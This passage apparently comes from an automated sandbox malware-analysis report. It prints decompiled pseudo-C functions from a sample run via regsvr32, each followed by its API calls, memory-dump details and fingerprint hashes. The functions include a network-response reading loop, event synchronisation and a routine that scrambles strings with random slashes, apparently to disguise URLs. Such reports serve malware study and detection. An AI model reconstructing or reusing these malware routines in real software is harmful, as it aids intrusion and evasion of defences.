                                    					E001A430F(_t79,  &_v428);
                                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E001A6C82(_t101,  &_v428, _a8, _t96 - _t81);
                                    					E001A6C82(_t79,  &_v156, _a12, _t97);
                                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                    					_t66 = E001A430F(_t101,  &E001AA188);
                                    					_t103 = _t101 - _t79;
                                    					_a8 = _t103;
                                    					if(_t103 < 0) {
                                    						L17:
                                    						E001A430F(_a16, _a4);
                                    						E001A24AE(_t79,  &_v428, _a4, _t97);
                                    						memset( &_v428, 0, 0x10c);
                                    						_t55 = memset( &_v156, 0, 0x84);
                                    						goto L18;
                                    					}
                                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                    					do {
                                    						if(_v8 != 0xffffffff) {
                                    							_push(1);
                                    							_push(0);
                                    							_push(0);
                                    							_push( *_t99);
                                    							L001A7DDC();
                                    							_t74 = _t66 +  *(_t99 - 4);
                                    							asm("adc edx, esi");
                                    							_push(0);
                                    							_push(_v8 + 1);
                                    							_push(_t92);
                                    							_push(_t74);
                                    							L001A7DD6();
                                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                                    								_t74 = _t74 | 0xffffffff;
                                    								_v16 = _v16 & 0x00000000;
                                    							}
                                    						} else {
                                    							_t74 =  *_t99;
                                    						}
                                    						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                    						_a12 = _t74;
                                    						_t76 = E001A3BCC(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                    						while(1) {
                                    							 *_t99 =  *_t99 - _t76;
                                    							if( *_t99 != 0) {
                                    								goto L14;
                                    							}
                                    							L13:
                                    							_t92 =  &_v156;
                                    							if(E001A4858(_t79, _t92, _t106) < 0) {
                                    								break;
                                    							}
                                    							L14:
                                    							_a12 = _a12 + 1;
                                    							_t76 = E001A319B(_t79,  &_v156, _t106, _t106);
                                    							 *_t99 =  *_t99 - _t76;
                                    							if( *_t99 != 0) {
                                    								goto L14;
                                    							}
                                    							goto L13;
                                    						}
                                    						_a8 = _a8 - 1;
                                    						_t66 = _a12;
                                    						_t99 = _t99 - 4;
                                    						 *(_a8 * 4 +  &E001AA188) = _t66;
                                    					} while (_a8 >= 0);
                                    					_t97 = _v12;
                                    					goto L17;
                                    				}
                                    				while(_t81 < _t96) {
                                    					_t81 = _t81 + 1;
                                    					_t56 = _t56 >> 1;
                                    					if(_t56 != 0) {
                                    						continue;
                                    					}
                                    					goto L4;
                                    				}
                                    				goto L4;
                                    			}

                                    APIs
                                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 001A6877
                                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 001A688D
                                    • memset.NTDLL ref: 001A6936
                                    • memset.NTDLL ref: 001A694C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: memset$_allmul_aulldiv
                                    • String ID:
                                    • API String ID: 3041852380-0
                                    • Opcode ID: e667c44f839c6ea4f5e6baf6282770fe2c12bf05c9a4b0fc95d201c05da40f5e
                                    • Instruction ID: 7714359a5bba068aa381a33eba9587f5748d4378744b32ee0a13c0b3183143d6
                                    • Opcode Fuzzy Hash: e667c44f839c6ea4f5e6baf6282770fe2c12bf05c9a4b0fc95d201c05da40f5e
                                    • Instruction Fuzzy Hash: 6E41D035A00219AFDF10DF68CC81BEE7779EF66320F044569F819A7281DBB09E54CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,6E2C827C,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 6E2C99B1
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E2C9A3A
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E2C9A4C
                                    • __freea.LIBCMT ref: 6E2C9A55
                                      • Part of subcall function 6E2C6950: RtlAllocateHeap.NTDLL(00000000,?), ref: 6E2C6982
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                    • String ID:
                                    • API String ID: 2652629310-0
                                    • Opcode ID: 44342ab8db0a3feb9f240d7a1ee46a472e2c4ee73e9466d24454c182e9969ec1
                                    • Instruction ID: 3e7429a5c37e17d31dde03fddbb90971db27e928f84029b3fb3f442235382afe
                                    • Opcode Fuzzy Hash: 44342ab8db0a3feb9f240d7a1ee46a472e2c4ee73e9466d24454c182e9969ec1
                                    • Instruction Fuzzy Hash: 0331B332A1050BAFDF55CFA5CC85DEE3BA6EB41B15F044668EC18D7140E735C964CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 56%
                                    			E001A4182(void* __eax) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				void* _v24;
                                    				void* __esi;
                                    				char* _t40;
                                    				long _t41;
                                    				intOrPtr _t45;
                                    				intOrPtr* _t46;
                                    				char _t48;
                                    				char* _t53;
                                    				long _t54;
                                    				intOrPtr* _t55;
                                    				void* _t64;
                                    
                                    				_t64 = __eax;
                                    				_t40 =  &_v12;
                                    				_v8 = 0;
                                    				_v16 = 0;
                                    				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
                                    				if(_t40 == 0) {
                                    					_t41 = GetLastError();
                                    					_v8 = _t41;
                                    					if(_t41 != 0x2efe) {
                                    						L26:
                                    						return _v8;
                                    					}
                                    					_v8 = 0;
                                    					L25:
                                    					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                                    					goto L26;
                                    				}
                                    				if(_v12 == 0) {
                                    					goto L25;
                                    				}
                                    				_push( &_v24);
                                    				_push(1);
                                    				_push(0);
                                    				if( *0x1aa144() != 0) {
                                    					_v8 = 8;
                                    					goto L26;
                                    				}
                                    				_t45 = E001A77D7(0x1000);
                                    				_v20 = _t45;
                                    				if(_t45 == 0) {
                                    					_v8 = 8;
                                    					L21:
                                    					_t46 = _v24;
                                    					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                    					goto L26;
                                    				} else {
                                    					goto L4;
                                    				}
                                    				do {
                                    					while(1) {
                                    						L4:
                                    						_t48 = _v12;
                                    						if(_t48 >= 0x1000) {
                                    							_t48 = 0x1000;
                                    						}
                                    						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
                                    						if(_t48 == 0) {
                                    							break;
                                    						}
                                    						_t55 = _v24;
                                    						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
                                    						_t17 =  &_v12;
                                    						 *_t17 = _v12 - _v16;
                                    						if( *_t17 != 0) {
                                    							continue;
                                    						}
                                    						L10:
                                    						if(WaitForSingleObject( *0x1aa2c4, 0) != 0x102) {
                                    							_v8 = 0x102;
                                    							L18:
                                    							E001A77EC(_v20);
                                    							if(_v8 == 0) {
                                    								_v8 = E001A44D1(_v24, _t64);
                                    							}
                                    							goto L21;
                                    						}
                                    						_t53 =  &_v12;
                                    						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
                                    						if(_t53 != 0) {
                                    							goto L15;
                                    						}
                                    						_t54 = GetLastError();
                                    						_v8 = _t54;
                                    						if(_t54 != 0x2f78 || _v12 != 0) {
                                    							goto L18;
                                    						} else {
                                    							_v8 = 0;
                                    							goto L15;
                                    						}
                                    					}
                                    					_v8 = GetLastError();
                                    					goto L10;
                                    					L15:
                                    				} while (_v12 != 0);
                                    				goto L18;
                                    			}

                                    APIs
                                    • GetLastError.KERNEL32 ref: 001A42A2
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • GetLastError.KERNEL32 ref: 001A4216
                                    • WaitForSingleObject.KERNEL32(00000000), ref: 001A4226
                                    • GetLastError.KERNEL32 ref: 001A4246
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                    • String ID:
                                    • API String ID: 35602742-0
                                    • Opcode ID: 4eef583c6609fb89207f8842bf5848193ac3ffbaeb0ec7049a5ff6f705946294
                                    • Instruction ID: 1cfe9a846f63be4da6e968ab6405513cfd53cd54e3724844d70f7db7bf0d35a0
                                    • Opcode Fuzzy Hash: 4eef583c6609fb89207f8842bf5848193ac3ffbaeb0ec7049a5ff6f705946294
                                    • Instruction Fuzzy Hash: 82411AB8900209EFDF109FD4D984AAEBBB8EF86345F60446AF902E6550D7709E84DB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SysAllocString.OLEAUT32(80000002), ref: 001A573A
                                    • SysAllocString.OLEAUT32(001A5BA8), ref: 001A577D
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A5791
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A579F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String$AllocFree
                                    • String ID:
                                    • API String ID: 344208780-0
                                    • Opcode ID: 6307143cf681a525771929df549f00f0fff57495123923cd7eea08e9089ead6b
                                    • Instruction ID: 96064a7a33f05a04171e99393b366b68932325805a0bc0e67656c60b372ef8c7
                                    • Opcode Fuzzy Hash: 6307143cf681a525771929df549f00f0fff57495123923cd7eea08e9089ead6b
                                    • Instruction Fuzzy Hash: 02313D76904109EFCB05CFD8D8C48AE7BB9BF59340B60842EF50AA7211E7359985CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E001A43C6(signed int _a4, signed int* _a8) {
                                    				void* __ecx;
                                    				void* __edi;
                                    				signed int _t6;
                                    				intOrPtr _t8;
                                    				intOrPtr _t12;
                                    				void* _t25;
                                    				void* _t26;
                                    				signed int* _t27;
                                    				signed short* _t28;
                                    				CHAR* _t30;
                                    				long _t31;
                                    				intOrPtr* _t32;
                                    
                                    				_t6 =  *0x1aa2c8; // 0xeb872a02
                                    				_t32 = _a4;
                                    				_a4 = _t6 ^ 0xd05b5869;
                                    				_t8 =  *0x1aa2d4; // 0x314d7d0
                                    				_t3 = _t8 + 0x1ab84d; // 0x61636f4c
                                    				_t25 = 0;
                                    				_t30 = E001A3971(_t3, 1);
                                    				if(_t30 != 0) {
                                    					_t25 = CreateEventA(0x1aa2f8, 1, 0, _t30);
                                    					E001A77EC(_t30);
                                    				}
                                    				_t12 =  *0x1aa2b4; // 0x10000106
                                    				if(_t12 != 6 || _t12 < 2) {
                                    					if( *_t32 != 0 && E001A11B8() == 0) {
                                    						_t28 =  *0x1aa120( *_t32, 0x20);
                                    						if(_t28 != 0) {
                                    							 *_t28 =  *_t28 & 0x00000000;
                                    							_t28 =  &(_t28[1]);
                                    						}
                                    						_t31 = E001A1697(0, _t28,  *_t32, 0);
                                    						if(_t31 == 0) {
                                    							if(_t25 == 0) {
                                    								goto L21;
                                    							}
                                    							_t31 = WaitForSingleObject(_t25, 0x4e20);
                                    							if(_t31 == 0) {
                                    								goto L19;
                                    							}
                                    						}
                                    					}
                                    					goto L11;
                                    				} else {
                                    					L11:
                                    					_t27 = _a8;
                                    					if(_t27 != 0) {
                                    						 *_t27 =  *_t27 | 0x00000001;
                                    					}
                                    					_t31 = E001A4BD9(_t32, _t26);
                                    					if(_t31 == 0 && _t25 != 0) {
                                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                    					}
                                    					if(_t27 != 0 && _t31 != 0) {
                                    						 *_t27 =  *_t27 & 0xfffffffe;
                                    					}
                                    					L19:
                                    					if(_t25 != 0) {
                                    						CloseHandle(_t25);
                                    					}
                                    					L21:
                                    					return _t31;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 001A3971: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,032F9F00,754B94D8,001A5FB9,?,69B25F44,E8FA7DD7,00000000,?,?,?,001A5FB9), ref: 001A39A7
                                      • Part of subcall function 001A3971: lstrcpy.KERNEL32(00000000,00000000), ref: 001A39CB
                                      • Part of subcall function 001A3971: lstrcat.KERNEL32(00000000,00000000), ref: 001A39D3
                                    • CreateEventA.KERNEL32(001AA2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,001A17D2,?,?,?), ref: 001A4405
                                      • Part of subcall function 001A77EC: HeapFree.KERNEL32(00000000,00000000,001A1333), ref: 001A77F8
                                    • WaitForSingleObject.KERNEL32(00000000,00004E20), ref: 001A4463
                                    • WaitForSingleObject.KERNEL32(00000000,00004E20), ref: 001A4491
                                    • CloseHandle.KERNEL32(00000000), ref: 001A44A9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                    • String ID:
                                    • API String ID: 73268831-0
                                    • Opcode ID: ccc8f6f63b9d21bd48afd7b38ec55a112519af3c1834762cd649f344bfdd5a77
                                    • Instruction ID: 5de28332e8d7f7533f99a7e8a1972a9dac6a0b578716ff4909e24a8a93d9b0e8
                                    • Opcode Fuzzy Hash: ccc8f6f63b9d21bd48afd7b38ec55a112519af3c1834762cd649f344bfdd5a77
                                    • Instruction Fuzzy Hash: B221B27A601312ABD7215BA89C44B6BB3D8AFDF761F150625FE41AB292DBF4CC408790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 39%
                                    			E001A1723(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				void* _v28;
                                    				char _v32;
                                    				void* __esi;
                                    				void* _t29;
                                    				void* _t38;
                                    				signed int* _t39;
                                    				void* _t40;
                                    
                                    				_t36 = __ecx;
                                    				_v32 = 0;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_v12 = _a4;
                                    				_t38 = E001A5909(__ecx,  &_v32);
                                    				if(_t38 != 0) {
                                    					L12:
                                    					_t39 = _a8;
                                    					L13:
                                    					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                    						_t23 =  &(_t39[1]);
                                    						if(_t39[1] != 0) {
                                    							E001A3910(_t23);
                                    						}
                                    					}
                                    					return _t38;
                                    				}
                                    				if(E001A1FBC(0x40,  &_v16) != 0) {
                                    					_v16 = 0;
                                    				}
                                    				_t40 = CreateEventA(0x1aa2f8, 1, 0,  *0x1aa394);
                                    				if(_t40 != 0) {
                                    					SetEvent(_t40);
                                    					Sleep(0xbb8);
                                    					CloseHandle(_t40);
                                    				}
                                    				_push( &_v32);
                                    				if(_a12 == 0) {
                                    					_t29 = E001A4560(_t36);
                                    				} else {
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_t29 = E001A5AFA(_t36);
                                    				}
                                    				_t41 = _v16;
                                    				_t38 = _t29;
                                    				if(_v16 != 0) {
                                    					E001A44B9(_t41);
                                    				}
                                    				if(_t38 != 0) {
                                    					goto L12;
                                    				} else {
                                    					_t39 = _a8;
                                    					_t38 = E001A43C6( &_v32, _t39);
                                    					goto L13;
                                    				}
                                    			}













                                    APIs
                                    • CreateEventA.KERNEL32(001AA2F8,00000001,00000000,00000040,?,?,74EEBB27,00000000,74EC41C0,?,?,?,?,001A6E29,?,00000001), ref: 001A1774
                                    • SetEvent.KERNEL32(00000000,?,?,?,?,001A6E29,?,00000001,001A5FE7,00000002,?,?,001A5FE7), ref: 001A1781
                                    • Sleep.KERNEL32(00000BB8,?,?,?,?,001A6E29,?,00000001,001A5FE7,00000002,?,?,001A5FE7), ref: 001A178C
                                    • CloseHandle.KERNEL32(00000000), ref: 001A1793
                                      • Part of subcall function 001A4560: WaitForSingleObject.KERNEL32(00000000,?), ref: 001A463A
                                      • Part of subcall function 001A4560: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,001A17B3,?,?,?,?,?,001A6E29,?), ref: 001A4662
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                                    • String ID:
                                    • API String ID: 467273019-0
                                    • Opcode ID: a4afbeee79325856ff107648cd6a68fe5aef59d6b4fb91b94bc3de7394d29d40
                                    • Instruction ID: aceab791f4cb63e9c9c8d79cc59e58f83732879a0a9250f116f819cbd815d3a7
                                    • Opcode Fuzzy Hash: a4afbeee79325856ff107648cd6a68fe5aef59d6b4fb91b94bc3de7394d29d40
                                    • Instruction Fuzzy Hash: 5B219D7B900219BBCF10AFE5C8819EFB3BEAF46350F554529FA11A7100EB749D858BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E001A4671(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                    				intOrPtr _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				intOrPtr _t26;
                                    				intOrPtr* _t28;
                                    				intOrPtr _t31;
                                    				intOrPtr* _t32;
                                    				void* _t39;
                                    				int _t46;
                                    				intOrPtr* _t47;
                                    				int _t48;
                                    
                                    				_t47 = __eax;
                                    				_push( &_v12);
                                    				_push(__eax);
                                    				_t39 = 0;
                                    				_t46 = 0;
                                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                    				_v8 = _t26;
                                    				if(_t26 < 0) {
                                    					L13:
                                    					return _v8;
                                    				}
                                    				if(_v12 == 0) {
                                    					Sleep(0xc8);
                                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                    				}
                                    				if(_v8 >= _t39) {
                                    					_t28 = _v12;
                                    					if(_t28 != 0) {
                                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                    						_v8 = _t31;
                                    						if(_t31 >= 0) {
                                    							_t46 = lstrlenW(_v16);
                                    							if(_t46 != 0) {
                                    								_t46 = _t46 + 1;
                                    								_t48 = _t46 + _t46;
                                    								_t39 = E001A77D7(_t48);
                                    								if(_t39 == 0) {
                                    									_v8 = 0x8007000e;
                                    								} else {
                                    									memcpy(_t39, _v16, _t48);
                                    								}
                                    								__imp__#6(_v16);
                                    							}
                                    						}
                                    						_t32 = _v12;
                                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                    					}
                                    					 *_a4 = _t39;
                                    					 *_a8 = _t46 + _t46;
                                    				}
                                    				goto L13;
                                    			}















                                    APIs
                                    • Sleep.KERNEL32(000000C8), ref: 001A469F
                                    • lstrlenW.KERNEL32(?), ref: 001A46D5
                                    • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 001A46F6
                                    • SysFreeString.OLEAUT32(?), ref: 001A470A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeSleepStringlstrlenmemcpy
                                    • String ID:
                                    • API String ID: 1198164300-0
                                    • Opcode ID: c1618cb0eb3d0e2e9d92db493c3e568d8b961c77afa530104baeacff33442d6a
                                    • Instruction ID: 832baf5a44e65c4a4fd6d6e5e7a5ee3efa6397f0fb48054150f13c05c755862d
                                    • Opcode Fuzzy Hash: c1618cb0eb3d0e2e9d92db493c3e568d8b961c77afa530104baeacff33442d6a
                                    • Instruction Fuzzy Hash: 25218379901249FFCB10DFE8D984D9EBBB8FF8A355B1041A9E905D7210E770EA45CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E001A6006(unsigned int __eax, void* __ecx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				signed int _t21;
                                    				signed short _t23;
                                    				char* _t27;
                                    				void* _t29;
                                    				void* _t30;
                                    				unsigned int _t33;
                                    				void* _t37;
                                    				unsigned int _t38;
                                    				void* _t41;
                                    				void* _t42;
                                    				int _t45;
                                    				void* _t46;
                                    
                                    				_t42 = __eax;
                                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                    				_t38 = __eax;
                                    				_t30 = RtlAllocateHeap( *0x1aa290, 0, (__eax >> 3) + __eax + 1);
                                    				_v12 = _t30;
                                    				if(_t30 != 0) {
                                    					_v8 = _t42;
                                    					do {
                                    						_t33 = 0x18;
                                    						if(_t38 <= _t33) {
                                    							_t33 = _t38;
                                    						}
                                    						_t21 =  *0x1aa2a8; // 0x6aa3909f
                                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                    						 *0x1aa2a8 = _t23;
                                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                    						memcpy(_t30, _v8, _t45);
                                    						_v8 = _v8 + _t45;
                                    						_t27 = _t30 + _t45;
                                    						_t38 = _t38 - _t45;
                                    						_t46 = _t46 + 0xc;
                                    						 *_t27 = 0x2f;
                                    						_t13 = _t27 + 1; // 0x1
                                    						_t30 = _t13;
                                    					} while (_t38 > 8);
                                    					memcpy(_t30, _v8, _t38 + 1);
                                    				}
                                    				return _v12;
                                    			}


















                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001A6410,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A6011
                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 001A6029
                                    • memcpy.NTDLL(00000000,032F9858,-00000008,?,?,?,001A6410,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A606D
                                    • memcpy.NTDLL(00000001,032F9858,00000001,001A72E3,00000000,032F9858), ref: 001A608E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: memcpy$AllocateHeaplstrlen
                                    • String ID:
                                    • API String ID: 1819133394-0
                                    • Opcode ID: 23d510244093abe11fe52396f70c0c017d711550bbc7d6c8d358f1957aee4aab
                                    • Instruction ID: 716970113e2c9cd68be64773bf1d1dd708fdd275c6a2b2734acbfcfb52edc4ce
                                    • Opcode Fuzzy Hash: 23d510244093abe11fe52396f70c0c017d711550bbc7d6c8d358f1957aee4aab
                                    • Instruction Fuzzy Hash: 01110676A00114BFD7108B69DD84E9EBBBEEB923A0F440166F408D7150E7719E44C760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E001A38BC() {
                                    				void* _t1;
                                    				intOrPtr _t5;
                                    				void* _t6;
                                    				void* _t7;
                                    				void* _t11;
                                    
                                    				_t1 =  *0x1aa2c4; // 0x18c
                                    				if(_t1 == 0) {
                                    					L8:
                                    					return 0;
                                    				}
                                    				SetEvent(_t1);
                                    				_t11 = 0x7fffffff;
                                    				while(1) {
                                    					SleepEx(0x64, 1);
                                    					_t5 =  *0x1aa308; // 0x0
                                    					if(_t5 == 0) {
                                    						break;
                                    					}
                                    					_t11 = _t11 - 0x64;
                                    					if(_t11 > 0) {
                                    						continue;
                                    					}
                                    					break;
                                    				}
                                    				_t6 =  *0x1aa2c4; // 0x18c
                                    				if(_t6 != 0) {
                                    					CloseHandle(_t6);
                                    				}
                                    				_t7 =  *0x1aa290; // 0x2f00000
                                    				if(_t7 != 0) {
                                    					HeapDestroy(_t7);
                                    				}
                                    				goto L8;
                                    			}









                                    APIs
                                    • SetEvent.KERNEL32(0000018C,00000001,001A699F), ref: 001A38C7
                                    • SleepEx.KERNEL32(00000064,00000001), ref: 001A38D6
                                    • CloseHandle.KERNEL32(0000018C), ref: 001A38F7
                                    • HeapDestroy.KERNEL32(02F00000), ref: 001A3907
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CloseDestroyEventHandleHeapSleep
                                    • String ID:
                                    • API String ID: 4109453060-0
                                    • Opcode ID: e9ab08c68ffda79d73319a2774ac0e12c4375e0ef6f742c146c50ad22a287853
                                    • Instruction ID: 7b723e1c7a210b700cbb6a9742c78edef1289fa8ea79df6815bfa0147a371829
                                    • Opcode Fuzzy Hash: e9ab08c68ffda79d73319a2774ac0e12c4375e0ef6f742c146c50ad22a287853
                                    • Instruction Fuzzy Hash: EDF03975B003159BDB209B74EE4CF573BACAF07BA1B040210BD24D7AA4DB69C9D4CAA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E001A25ED(void** __esi) {
                                    				intOrPtr _v0;
                                    				intOrPtr _t4;
                                    				intOrPtr _t6;
                                    				void* _t8;
                                    				intOrPtr _t10;
                                    				void* _t11;
                                    				void** _t13;
                                    
                                    				_t13 = __esi;
                                    				_t4 =  *0x1aa37c; // 0x32f9858
                                    				__imp__(_t4 + 0x40);
                                    				while(1) {
                                    					_t6 =  *0x1aa37c; // 0x32f9858
                                    					_t1 = _t6 + 0x58; // 0x0
                                    					if( *_t1 == 0) {
                                    						break;
                                    					}
                                    					Sleep(0xa);
                                    				}
                                    				_t8 =  *_t13;
                                    				if(_t8 != 0 && _t8 != 0x1aa030) {
                                    					HeapFree( *0x1aa290, 0, _t8);
                                    				}
                                    				_t13[1] = E001A6BD2(_v0, _t13);
                                    				_t10 =  *0x1aa37c; // 0x32f9858
                                    				_t11 = _t10 + 0x40;
                                    				__imp__(_t11);
                                    				return _t11;
                                    			}











                                    APIs
